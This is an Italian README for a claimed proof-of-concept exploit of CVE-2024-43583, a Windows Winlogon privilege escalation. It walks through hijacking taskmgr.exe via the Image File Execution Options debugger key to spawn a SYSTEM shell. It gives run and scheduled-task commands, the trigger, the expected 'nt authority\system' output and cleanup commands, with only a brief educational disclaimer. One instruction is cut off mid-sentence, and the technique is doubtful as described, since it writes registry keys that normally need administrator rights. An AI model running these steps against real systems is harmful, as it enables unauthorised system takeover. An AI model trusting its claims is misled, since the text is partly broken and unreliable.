
Prova di concetto per CVE-2024-43583
Autore: No0B@ckSappi3 Instagram: No0BackSappi3
CVE-2024-43583 è una vulnerabilità di elevazione dei privilegi che interessa il componente Winlogon di Microsoft. Sfruttando questa falla, un utente con privilegi limitati può elevare i propri privilegi a SYSTEM, portando al pieno compromesso del sistema.
Questo proof-of-concept (PoC) sfrutta l'Hijacking del Debugger tramite la chiave di registro Image File Execution Options (IFEO) di Windows per sostituire un processo di sistema legittimo con un payload malevolo.
Versioni di Windows Affette
Windows 10 (1507 - 22H2) Windows 11 (21H2 - 24H2) Windows Server 2008 SP2 - 2022
Questo exploit è solo a scopo educativo e di ricerca. Non utilizzarlo su sistemi non autorizzati. L'uso improprio di questo exploit potrebbe essere illegale.
Assicurati che Python sia installato sul sistema di destinazione. In caso contrario, utilizza la versione compilata .exe.
python poc-43583.py
schtasks /create /tn "LowPrivExploit" /tr "C:\Path\To\python.exe C:\Path\To\poc-43583.py" /sc once /st 00:00 /ru lowpriv /f
schtasks /run /tn "LowPrivExploit"
Ctrl + Maiusc + Esc). Se l'operazione riesce, apparirà una shell SYSTEM al posto del normale Task Manager.Una volta eseguito l'exploit, verifica i tuoi privilegi:
whoami
Output previsto:
nt authority\system
Esegui di nuovo lo script e seleziona l'opzione [2] per rimuovere l'hijack.
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /f
schtasks /delete /tn "LowPrivExploit" /f
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"